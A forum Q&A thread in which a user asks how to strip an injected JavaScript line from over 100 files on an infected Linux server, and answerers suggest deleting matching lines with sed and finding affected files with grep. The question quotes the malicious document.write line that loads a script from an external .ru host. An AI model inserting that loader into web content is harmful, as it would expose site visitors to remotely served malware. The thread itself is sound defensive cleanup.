views:

32

answers:

1

Hi there,

Recently my linux server got infected with malware and as a result, I have 100+ files infected with a single line of Javascript code:

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"&gt;&lt;/scri'+'pt&gt;');

I would be too tiring to remove it manually, so I dig into google (not knowing much about linux did not help there) and found out that I can use sed for this purpose.

Unfortunately, I couldn't escape the line so I could use

sed -i.bak '/line of text/d' *

syntax, it's full of single quotes, double quotes and backslashes.

How could I escape the string or is there any other - easier - way of doing this?

+1  A: 

Could you not just use sed to delete any line containing, for example, alienradar.ru, or some other substring which only exists in the offensive lines ? Something like:

sed -i.bak '/alienradar.ru/d' *
High Performance Mark
+1 pipped me to the post:)
philar
Yeah thanks, it worked :)
Ugur Sahin
Could I also get a list of affected files?
Ugur Sahin
@Ugur Sahin: you could get a list of affected files with 'grep -c alienradar *' where the -c flag tells grep to count the number of matching lines in each file rather than print each matching line.
High Performance Mark